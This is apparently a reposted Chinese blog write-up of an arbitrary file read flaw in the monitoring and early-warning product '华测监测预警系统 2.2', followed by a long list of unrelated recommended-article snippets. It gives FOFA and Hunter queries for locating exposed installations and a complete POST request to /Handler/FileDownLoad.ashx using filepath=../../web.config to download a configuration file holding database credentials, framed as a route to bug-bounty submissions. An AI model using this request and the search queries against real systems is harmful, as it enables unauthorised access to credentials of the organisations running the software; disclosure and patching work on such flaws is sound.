zkzq
zkzq

华测监测预警系统 2.2---任意文件读取漏洞

目录

1. 资产搜集

2. 漏洞复现

3. 实战总结

1. 资产搜集

直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了

FOFA语法 app=”华测监测预警系统2.2”

Hunter语法 web.body=”华测监测预警系统2.2”

华测监测预警系统 2.2---任意文件读取漏洞_第1张图片

2. 漏洞复现

这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。

 
  
     
   
  1.  
    POST /Handler/FileDownLoad.ashx HTTP/1.1
     
    2.  
   
  2.  
    Host: ip:port
     
    3.  
   
  3.  
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
     
    4.  
   
  4.  
    Accept-Encoding: gzip, deflate
     
    5.  
   
  5.  
    Accept: */*
     
    6.  
   
  6.  
    Connection: close
     
    7.  
   
  7.  
    Content-Type: application/x-www-form-urlencoded
     
    8.  
   
  8.  
    Content-Length: 36
     
    9.  
   
  9.  
     
    10.  
   
  10.  
    filename=1&filepath=../../web.config
     
    11.  
  
 
  
这里的filename随便传参,只是一个文件名字。
 filepath是文件路径,这里访问后会直接下载文件到本地。
 
  
 
  
华测监测预警系统 2.2---任意文件读取漏洞_第2张图片
 
  
文件里包含了数据库的账号密码
 
  
3. 实战总结
 
  
最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!!!
 
  
华测监测预警系统 2.2---任意文件读取漏洞_第3张图片
 
  
 
  
图片
 
  
                                                            没看够~?欢迎关注扫一扫!
 
  
华测监测预警系统 2.2---任意文件读取漏洞_第4张图片华测监测预警系统 2.2---任意文件读取漏洞_第5张图片
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(漏洞复现,技术干货,实纪实战,安全,web安全,网络,前端,数据库)

        

            

                
    
                    
  • CAN从站转Modbus TCP主站总线协议转换网关
                        JIANGHONGZN
工业通讯协议网关CANMODBUSMODBUSTCP
                        
    同学们,今天给大家详细讲解下CAN从站转ModbusTCP主站总线协议转换网关一,设备主要功能JH-CAN-TCP疆鸿智能网关实现连接CAN设备和网络到ModbusTCP网络系统。该网关可实现双向数据交换,既允许现有的、低成本的CAN设备集成到ModbusTCP系统,也可提供来自ModbusTCP的数据给CAN设备使用。应用广泛:本产品广泛应用于CAN协议接口的仪表、变频器、电机、机械手臂等等。C
    
                    
    • 
                    
  • MySQL数据库核心技术深度解析:SQL语句最佳实践与性能优化指南
                        有趣的灵魂465
mysql
                        
    MySQL数据库大师之路:从语法精要到高阶优化全攻略一、开篇:构建系统化的MySQL知识体系在完成《MySQL数据库技术》课程学习后,我通过300+小时的实战演练和源码研究,形成了这套覆盖MySQL5.7/8.0核心技术的知识体系。本文不仅包含标准SQL语法,更将深入InnoDB存储引擎原理、索引实现机制和事务隔离级别的底层实现,帮助开发者跨越从"会写SQL"到"精通数据库"的鸿沟。二、数据库设计
    
                    
    • 
                    
  • ASP.NET Core + Vue.js前后端分离黄金法则:从零到部署的深度实战
                        墨夶
C#学习资料asp.netvue.js后端
                        
    ——跨域、热更新、容器化部署一网打尽为什么选择前后端分离?在微服务与敏捷开发盛行的今天,前后端分离架构已成为企业级应用的标配。本文将通过12个实战代码示例、跨域问题终极解决方案和Docker部署全流程,手把手教你实现:零配置跨域通信Vue热重载+WebAPI实时调试JWT身份验证与权限控制生产环境优化与容器化部署一、环境准备与项目搭建1.1开发环境配置工具版本要求官网链接.NET8SDK8.0.1
    
                    
    • 
                    
  • 一站式 IT 资产管理:零信任产品的多维对比
                        scuter_yu
安全网络
                        
    在数字化转型的浪潮中,企业面临着日益复杂的网络安全挑战,零信任安全理念应运而生并逐渐成为保障企业信息安全的重要手段。腾讯iOA零信任产品、深信服零信任安全解决方案、奇安信零信任安全解决方案以及GoogleBeyondCorp零信任网络架构等产品在市场上各有千秋,尤其在一站式IT资产管理方面,它们展现了不同的特色与优势。以下是对每款产品在一站式IT资产管理方面的分点对比:腾讯iOA零信任产品细粒度统
    
                    
    • 
                    
  • 业界优秀零信任安全管理系统产品介绍
                        scuter_yu
安全网络
                        
    腾讯iOA零信任安全管理系统腾讯iOA零信任安全管理系统是基于腾讯自身无边界零信任企业网的最佳实践推出的终端访问管理方案。它以可信终端、可信身份、可信应用、可信链路为核心,全方位保护企业终端安全,无需VPN即可实现远程办公,且支持公有云和本地云部署模式。该系统依托腾讯安全威胁情报中心,日均拦截超10亿次攻击,其客户端轻量化设计兼容多平台,员工接受度高,助力企业安全上云和数字化转型。深信服零信任iT
    
                    
    • 
                    
  • CST微波工作室学习笔记2 主要特点
                        raininforest
CST学习硬件工程
                        
    概要基于Windows98/Me、WindowsNT4、Windows2000和WindowsXP的图形用户界面快速并能有效使用内存的有限积分(FI)算法由于理想边界拟合技术和薄片技术的采用,性能更加卓越结构建模基于先进ACIS内核的参量化实体建模前端,并附带优异的结构可视化功能。内含多种建模技术,可快速进行结构变换。可通过SAT(如AutoCAD)、IGES、STEP、ProE、CATIA4、C
    
                    
    • 
                    
  • 【分布式 ID】生成唯一 ID 的几种方式
                        也无风雨晴
工具分布式分布式ID
                        
    文章目录1.什么是唯一ID2.UUID2.1优点2.2缺点3.数据库自增ID3.1优点3.2缺点4.利用redis来实现自增id4.1优点4.2缺点5.雪花算法5.1优点5.2缺点6.数据库号段6.1优点6.2缺点7.小结1.什么是唯一ID分布式ID是指在分布式系统中需要生成的全局唯一的标识符。比如在电商、物流等行业,每笔订单都需要一个唯一的订单ID。通过这个ID,商家可以跟踪订单的状态,包括下单
    
                    
    • 
                    
  • Python爬虫(57)Python数据可视化全攻略:Matplotlib从入门到三维动态图表(8000字实战教程)
                        一个天蝎座白勺程序猿
Python爬虫入门到高阶实战python爬虫信息可视化
                        
    目录背景与需求分析第一章:Matplotlib基础与核心工作流1.1环境配置与基础架构1.2基础图表类型实战1.2.1折线图进阶1.2.2分组柱状图第二章:高阶可视化技术2.1子图矩阵与多面板布局2.2动态可视化与动画第三章:行业案例实战案例1:电商用户行为分析案例2:医疗影像数据可视化第四章:可视化美学与工程优化4.1配色方案实战4.2百万级数据渲染优化第五章:交互式扩展方案5.1Matplot
    
                    
    • 
                    
  • 未来运维,绝绝AI 必备
                        AI_运维_攻城狮
ai运维人工智能
                        
    在当今数字化时代,运维工作对于企业的稳定运行至关重要。随着科技的不断进步,人工智能(AI)和自动化技术正逐渐改变着运维行业的面貌。本文将分析运维行业的未来发展方向,探讨人工智能在运维中的应用前景、自动化运维的发展趋势,并对未来的运维工作模式和技能需求进行预测和分析,以帮助读者更好地规划自己的职业发展。一、运维行业现状目前,运维工作主要包括服务器管理、网络管理、数据库管理、应用程序监控等方面。运维工
    
                    
    • 
                    
  • 赋能低压分布式光伏“四可”建设,筑牢电网安全新防线
                        Amy18702111823
分布式
                        
    在“双碳”目标驱动下,分布式光伏正以前所未有的速度接入电网,尤其是低压(380V/220V)层面。然而,海量“绿电”的随机性、间歇性并网,犹如一把双刃剑——在带来清洁能源的同时,也给电网的安全稳定运行与可靠供电带来了严峻挑战。如何让这些分散的“毛细血管”变得“可观、可测、可调、可控”(四可),已成为电网企业和新能源管理者亟待解决的核心命题。“四可”落地:低压分布式光伏管理的硬核需求实现“四可”并非
    
                    
    • 
                    
  • Java分布式任务调度交响乐:用代码指挥千台服务器跳起精准的华尔兹
                        墨夶
Java学习资料1java分布式服务器
                        
    一、架构设计:分布式任务调度的指挥系统1.1架构图(用文字构建你的想象)[调度中心]→[任务路由]→[执行器集群]↑↓││├─数据库存储─┤││└─监控告警─┘关键组件:调度中心:任务的"总指挥",负责任务注册、调度、状态监控执行器集群:任务的"舞团",每个节点都是潜在的表演者任务路由:动态分配任务的"交通调度系统"数据库存储:任务元数据的"记分牌"二、核心技术实现:分布式调度的魔法阵2.1XXL
    
                    
    • 
                    
  • AttnRNN:参数更少,却断档碾压LSTM/GRU的新RNN
                        wq舞s
人工智能python深度学习deeplearningai科技pytorch
                        
    研究者与发布者为:CSDNwq舞s,知乎wqwsgithubwqws突破性进展!新型注意力RNN(AttnRNN)在长序列任务中全面超越传统RNN模型在深度学习领域,循环神经网络(RNN)及其变体GRU和LSTM长期以来一直是处理序列数据的首选架构。然而,它们在长序列任务中始终存在信息遗忘和梯度消失等问题。今天,我很高兴地宣布一种全新的RNN架构——AttnRNN,它在多个长序列基准测试中全面超越
    
                    
    • 
                    
  • MySQL调优实战
                        fei飛fei飞
mysql数据库
                        
    各位小伙伴是否在工作中遇到过类似的问题?一个简单的用户查询居然用时15s,接到优化sql语句的任务又无从下手。今天,我们简单的讲讲MySql如何调优。sqlSELECT*FROMusersWHEREage>18ORDERBYcreate_timeDESC;如上图,一个简单的查询sql为啥用时如此之久呢,我们先看这个sql可能存在的问题。1.索引缺失或不合理问题:该查询涉及两个字段条件(age>18
    
                    
    • 
                    
  • PgSQL内核特性 | Brin索引
                        yzs87
搜索引擎数据库
                        
    PgSQL内核特性|Brin索引数据库在进行过滤扫描或者join时,如果该表特别大,那么就需要顺序扫描表的所有数据然后进行过滤,或者扫描所有数据进行join条件探测。这对IO的负载影响特别大,当在join时,比如HashJoin的外表,需要对每个数据都进行Hash表探测,进一步影响性能。现有列存比如Infobright、Parquet、hydra等都对存储进行了类似的改进,在每个block中增加了
    
                    
    • 
                    
  • 打造世赛级信息安全实训室:一站式建设方案大揭秘
                        

                        
    在当今数字化时代,信息安全已成为全球关注的焦点。随着信息技术的飞速发展,各类网络安全威胁日益复杂多样,对专业信息安全人才的需求也愈发迫切。世界职业院校技能大赛作为全球最高层级的职业技能赛事,其信息安全项目更是汇聚了各国顶尖的技能人才,展示着这一领域最前沿的技术与应用。打造一个达到世赛级别的信息安全实训室,无疑是培养高素质信息安全人才、提升国家网络安全防御能力的关键举措。以下将为您揭秘一站式建设世赛
    
                    
    • 
                    
  • C语言教学大变革!DeepSeek如何改变高职院校编程课堂?
                        武汉唯众智创
c语言开发语言程序设计Deepseek
                        
    一、引言在当今数字化转型的浪潮中,程序设计与分析能力已成为高职教育中不可或缺的核心竞争力。作为编程语言的基础,C语言不仅训练学生的计算思维,还培养其算法实现能力。然而,当前高职院校的C语言教学面临诸多挑战,如实践环节薄弱、学生创新能力不足等。DeepSeek等新一代智能编码支持系统的出现,为这一现状带来了转机。该系统融合了深度神经网络与语义解析技术,能够智能生成代码、优化缺陷检测、解构程序逻辑,并
    
                    
    • 
                    
  • Muduo 定时器
                        小白书舍
c++网络
                        
    TimeQueue定时器图片转载自:muduo网络库源码解析(4):TimerQueue定时机制_李兆龙的技术博客_51CTO博客添加新的定时器TimerIdTimerQueue::addTimer(TimerCallbackcb,//用户自定义回调Timestampwhen,//定时器的超时时刻doubleinterval)//重复触发间隔,小于0则不重复触发{Timer*timer=newTi
    
                    
    • 
                    
  • Redis哨兵模式(Sentinel、1主2从3哨兵6台服务器配置实战、客户端调用、日志解析、主观下线、客观下线、仲裁、脑裂问题、哨兵长与从节点投票选举过程与原理)
                        小松聊PHP进阶
Redisredis服务器运维nosql后端架构数据库
                        
    哨兵模式官方文档:https://redis.io/docs/latest/operate/oss_and_stack/management/sentinel关联博客:Redis主从复制(下文能用到)极简概括:自动监控Redis主节点是否故障的一种方案,若主节点故障,则Redis会根据投票数自动将从库切换为主库(这个过程,叫仲裁)。解决问题:在主从复制的架构模式下,Redis主节点挂掉后,从节点无
    
                    
    • 
                    
  • 图论算法的大家庭——c++中的图论算法
                        imlarry0616
深度优先算法图论
                        
    图论算法是处理图结构问题的核心工具,广泛应用于路径规划、社交网络分析、计算机网络等领域。以下从基础概念、经典算法及其代码实现展开详细介绍,涵盖DFS、BFS、最短路径、最小生成树等核心内容,并附C++代码示例及注释。一、图的基础概念图的定义:由顶点(Vertex)集合V和边(Edge)集合E组成,记作G=(V,E)。分类:无向图:边无方向(如社交网络中的朋友关系)。有向图:边有方向(如网页链接关系
    
                    
    • 
                    
  • 基于springboot+mysql+jpa+html实现商品销售信息系统
                        五星资源
springbootmysqljava
                        
    基于springboot+mysql+jpa+html实现商品销售信息系统一、系统介绍1、系统主要功能:2.涉及技术框架:3.本项目所用环境:二、功能展示三、其它系统四、获取源码一、系统介绍1、系统主要功能:订单管理模块商品管理模块品牌管理模块分类管理模块客户管理模块供应商管理模块2.涉及技术框架:web框架:SpringBoot数据库框架:SpingDataJPA数据库:MySql项目构建工具:
    
                    
    • 
                    
  • spring注解整合
                        多大的心灵伤害吖
springjava
                        
    使用注解的优势:1.采用纯java代码,不在需要配置繁杂的xml文件2.在配置中也可享受面向对象带来的好处3.类型安全对重构可以提供良好的支持4.减少复杂配置文件的同时亦能享受到springIoC容器提供的功能一、注解详解(配备了完善的释义)------(可采用ctrl+F来进行搜索哦~~~~)@SpringBootApplication:申明让springboot自动给程序进行必要的配置,这个配
    
                    
    • 
                    
  • 优秀开源库muduo阅读笔记
                        VictorLeo
网路编程服务端编程muduo
                        
    muduo阅读笔记目录设计经验和思想服务端编程设计std::bind和std::function(基于closure闭包的编程)参考资料muduo开源库的笔记,比较杂,没有详细整理,现在就这么杂乱放着,等真的需要再好好整理。设计经验和思想对象构造做到线程安全,唯一的要求就是不要暴露this指针.即不要在构造函数中注册任何回调;也不要在构造函数中把this传给跨线程的对象;即便在构造函数的最后一行也
    
                    
    • 
                    
  • 前端领域 Vite 与 Webpack 的深度对比
                        前端视界
前端webpacknode.jsai
                        
    前端领域Vite与Webpack的深度对比关键词:Vite、Webpack、前端构建工具、模块打包、开发体验、性能优化、ESModules摘要:本文深入对比前端领域两大构建工具Vite和Webpack的核心原理、架构设计和使用场景。通过分析它们的底层机制、开发体验、构建流程和性能表现,帮助开发者理解如何在不同项目需求下做出合理选择。文章包含详细的技术原理图解、实际项目对比示例和未来发展趋势分析。背
    
                    
    • 
                    
  • Dubbo 令牌验证:防止服务被非法调用
                        Java技术栈实战
dubbo网络ai
                        
    Dubbo令牌验证:防止服务被非法调用关键词:Dubbo、令牌验证、分布式服务、服务安全、非法调用防护摘要:在分布式系统中,服务暴露在网络中可能面临非法调用的风险。Dubbo作为国内最流行的分布式服务框架,提供了「令牌验证」这一轻量级安全机制,能有效阻止未授权服务的访问。本文将用「小区门禁卡」的生活化比喻,结合代码示例和实战案例,从原理到落地手把手教你掌握Dubbo令牌验证,彻底搞懂如何为服务调用
    
                    
    • 
                    
  • 【redis】介绍和安装
                        火龙谷
redisredis数据库缓存
                        
    介绍Redis是一款高性能的开源内存数据库,核心采用键值对(Key-Value)存储模型。其最大优势在于数据完全基于内存操作,读写速度远超传统磁盘数据库(内存访问速度可达磁盘的数千倍,固态硬盘仍有显著差距)。支持丰富的数据结构(字符串、哈希、列表、集合等),并非简单存储单一值。提供持久化机制(RDB快照/AOF日志),确保重启后数据可恢复。具备主从复制、哨兵高可用、集群分片等分布式能力,扩展性强。
    
                    
    • 
                    
  • 网络安全运维与攻防演练综合实训室解决方案
                        武汉唯众智创
web安全运维安全网络安全运维与攻防演练实训室网络安全运维攻防演练实训室网络安全运维与攻防演练
                        
    一、前言在数字化浪潮席卷全球的当下,网络已深度融入社会的各个层面,成为推动经济发展、社会进步和科技创新的关键力量。从日常生活中的移动支付、社交互动,到企业运营中的数据管理、业务拓展,再到国家关键基础设施的运行,网络的身影无处不在。在日常生活中,我们频繁地在网络上进行各种活动,如网上购物、移动支付、社交互动等,这些活动都涉及到个人敏感信息的传输和存储。一旦这些信息被泄露,个人可能面临财产损失、身份被
    
                    
    • 
                    
  • 创建对象的步骤
                        玩代码
jvm
                        
    以下是创建对象的具体步骤及详细说明,结合关键流程与原理分析:1.判断对象是否加载、链接阶段、初始化阶段类加载检查是对象创建的第一步。当遇到new指令时,虚拟机会检查该指令的参数是否能在常量池中定位到类的符号引用,并检查该类是否已被加载、解析和初始化。若未加载,需先执行类加载过程。链接分为三个子步骤:验证:确保类信息符合虚拟机规范,避免安全问题。准备:为类的静态变量分配内存并设置默认初始值(如int
    
                    
    • 
                    
  • muduo
                        2301_80355452
php前端开发语言
                        
    好的,我们来深入剖析陈硕老师开发的著名C++网络库——muduo。它以“简单、高效、易用”著称,是学习LinuxC++高性能网络编程的绝佳范本。我会尽量详细、通俗地讲解其核心思想、关键组件、源码结构和工作原理。核心思想:Reactor模式(Non-blocking+I/OMultiplexing)muduo的灵魂是Reactor模式。理解它就理解了muduo的一半。想象一下:传统阻塞模型的问题:想
    
                    
    • 
                    
  • Python程序设计 第6章:函数和函数式编程
                        若北辰
Python程序设计python开发语言
                        
    Python程序设计Python是全球范围内最受欢迎的编程语言之一,学好Python将对个人职业生涯产生很大的助力,Python在机器学习、深度学习、数据挖掘等领域应用极为广泛。在数据科学家/数据分析师、人工智能工程师、网络安全工程师、软件工程师/全栈工程师、自动化测试工程师等岗位,年入50万,很普遍,学好Python,高薪就业不是问题,因此推出Python程序设计系列文章:Python程序设计第
    
                    
    • 
                    
  • 纯前端本地文件管理器(VSCode风格)(浏览器对本地文件增删改查)
                        与鱼有约
前端vscodeide
                        
    纯前端本地文件管理器(VSCode风格)(浏览器对本地文件增删改查)简介本项目为一个纯前端实现的本地文件管理器网页(index.html),可在Chrome/Edge浏览器中直接打开,具备类似VSCode的本地文件夹操作体验。无需后端,所有功能均在浏览器端实现。主要功能选择本地文件夹用户点击左上角文件夹按钮,授权后可浏览和操作本地文件夹内容。文件树展示以树形结构展示所选文件夹下的所有文件和子文件夹
    
                    
    • 
                                
  • jdk tomcat 环境变量配置
                                    Array_06
javajdktomcat
                                    
    Win7 下如何配置java环境变量 
 
1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 
2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 
3。分别配置高级环境变量。 
   电脑-->右击属性-->高级环境变量-->环境变量。 
 
 
分别配置 : 
 
path   
 &nbs
    
                                
    • 
                                
  • Spring调SDK包报java.lang.NoSuchFieldError错误
                                    bijian1013
javaspring
                                    
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
    
                                
    • 
                                
  • LeetCode[位运算] - #136 数组中的单一数
                                    Cwind
java题解位运算LeetCodeAlgorithm
                                    
    原题链接:#136 Single Number 
要求: 
给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 
注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 
难度:中等 
分析: 
题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
    
                                
    • 
                                
  • qq登陆界面开发
                                    15700786134
qq
                                    
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: 
public class First {         public void initul(){        jf=ne
    
                                
    • 
                                
  • Linux的程序包管理器RPM
                                    被触发
linux
                                    
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
    
                                
    • 
                                
  • socket通信遇到EOFException
                                    肆无忌惮_
EOFException
                                    
    java.io.EOFException 
at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) 
at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
    
                                
    • 
                                
  • 基于spring的web项目定时操作
                                    知了ing
javaWeb
                                    
    废话不多说,直接上代码,很简单 配置一下项目启动就行 
1,web.xml 
 

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns="h
    
                                
    • 
                                
  • 树形结构的数据库表Schema设计
                                    矮蛋蛋
schema
                                    
    原文地址: 
http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488 
 
 
    程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
    
                                
    • 
                                
  • maven将jar包和源码一起打包到本地仓库
                                    alleni123
maven
                                    
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository 
 
 
 
<project>
  ...
  <build>
    <plugins>
      <plugin>
        <groupI
    
                                
    • 
                                
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!!
                                    百合不是茶

                                    
    类 File 
File是指文件和目录路径名的抽象表示形式。 
1,何为文件: 
标准文件(txt doc mp3...) 
目录文件(文件夹) 
虚拟内存文件 
  
2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
    
                                
    • 
                                
  • Spring注入有继承关系的类(2)
                                    bijian1013
javaspring
                                    
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 
package com.bijian.spring.test4;

public class AClass {

    private String a;
    private String b;
   
    public String getA() {
        retu
    
                                
    • 
                                
  • 30岁转型期你能否成为成功人士
                                    bijian1013
成长励志
                                    
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
    
                                
    • 
                                
  • 【Velocity四】Velocity与Java互操作
                                    bit1129
velocity
                                    
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础, 
     POJO 
   
package com.tom.servlets;

public
    
                                
    • 
                                
  • 【Hive十一】Hive数据倾斜优化
                                    bit1129
hive
                                    
    什么是Hive数据倾斜问题 
  
 
 操作:join,group by,count distinct 
 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 
 原因:key分布不均匀 
 倾斜度衡量:平均记录数超过50w且
    
                                
    • 
                                
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等
                                    ronin47
nginx lua csrf
                                    
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com 
Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 
location /{
    
                                
    • 
                                
  • java-3.求子数组的最大和
                                    bylijinnan
java
                                    
    package beautyOfCoding;


public class MaxSubArraySum {

	/**
	 * 3.求子数组的最大和
题目描述:
输入一个整形数组,数组里有正数也有负数。
数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。
求所有子数组的和的最大值。要求时间复杂度为O(n)。
例如输入的数组为1, -2, 3, 10, -4,
    
                                
    • 
                                
  • Netty源码学习-FileRegion
                                    bylijinnan
javanetty
                                    
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 
可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: 
 


		//pipeline(没有诸如“FileRegionEncoder”的handler):
		public ChannelPipeline ge
    
                                
    • 
                                
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题
                                    cngolon
跨浏览器复制到粘贴板Zero Clipboard
                                    
    Zero Clipboard的实现原理 
Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 
Zero Clipboard的安装方法 
首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js 
    
                                
    • 
                                
  • 单例模式
                                    cuishikuan
单例模式
                                    
    第一种(懒汉,线程不安全): 
public class Singleton {   2     private static Singleton instance;   3     pri
    
                                
    • 
                                
  • spring+websocket的使用
                                    dalan_123

                                    
    一、spring配置文件 
<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
    
                                
    • 
                                
  • 细节问题:ZEROFILL的用法范围。
                                    dcj3sjt126com
mysql
                                    
       1、zerofill把月份中的一位数字比如1,2,3等加前导0 
 
      
mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
    
                                
    • 
                                
  • Android开发10——Activity的跳转与传值
                                    dcj3sjt126com
Android开发
                                    
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。 
  
一、Activity跳转 
方法一Intent intent = new Intent(A.this, B.class); startActivity(intent) 
  
方法二Intent intent = new Intent();intent.setCla
    
                                
    • 
                                
  • jdbc 得到表结构、主键
                                    eksliang
jdbc 得到表结构、主键
                                    
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 
假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
    
                                
    • 
                                
  • Android 应用程序开关GPS
                                    gqdy365
android
                                    
    要在应用程序中操作GPS开关需要权限: 
 

<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
 
但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 
1、方法一:将项目放到Android源码中编译; 
2、方法二:网上有人说cl
    
                                
    • 
                                
  • Windows上调试MapReduce
                                    zhiquanliu
mapreduce
                                    
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
    
                                
    • 
                                
  • 如何看待一些知名博客推广软文的行为?
                                    justjavac
博客
                                    
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 
互联网上的两种典型心态: 
 
  当初求种像条狗,如今撸完嫌人丑  
  当初搜贴像条犬,如今读完嫌人软  
 
你为啥感觉不舒服呢? 
难道非得要作者把自己的劳动成果免费给你用,你才舒服? 
就如同 Google 关闭了 Gooled Reader,那是
    
                                
    • 
                                
  • sql优化总结
                                    macroli
sql
                                    
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢! 
  
要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。 
  
一、简单的统计语句执行时间 
declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
    
                                
    • 
                                
  • Linux Oracle中常遇到的一些问题及命令总结
                                    超声波
oraclelinux
                                    
    1.linux更改主机名 
  
(1)#hostname oracledb    临时修改主机名 
(2) vi /etc/sysconfig/network   修改hostname 
(3) vi /etc/hosts        修改IP对应的主机名 
  
2.linux重启oracle实例及监听的各种方法 
(注意操作的顺序应该是先监听,后数据库实例) 
&nbs
    
                                
    • 
                                
  • hive函数大全及使用示例
                                    superlxw1234
hadoophive函数
                                    
      
具体说明及示例参 见附件文档。  
  
  
文档目录: 
  
目录 
一、关系运算: 4 
1. 等值比较: = 4 
2. 不等值比较: <> 4 
3. 小于比较: < 4 
4. 小于等于比较: <= 4 
5. 大于比较: > 5 
6. 大于等于比较: >= 5 
7. 空值判断: IS NULL 5
    
                                
    • 
                                
  • Spring 4.2新特性-使用@Order调整配置类加载顺序
                                    wiselyman
spring 4
                                    
    4.1 @Order 
 
 Spring 4.2 利用@Order控制配置类的加载顺序 
  
4.2 演示 
 
 两个演示bean 
 
package com.wisely.spring4_2.order;

public class Demo1Service {

}

 
package com.wisely.spring4_2.order;

public class
    
                                
    • 
                

            

        

    




    

        

            按字母分类:
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他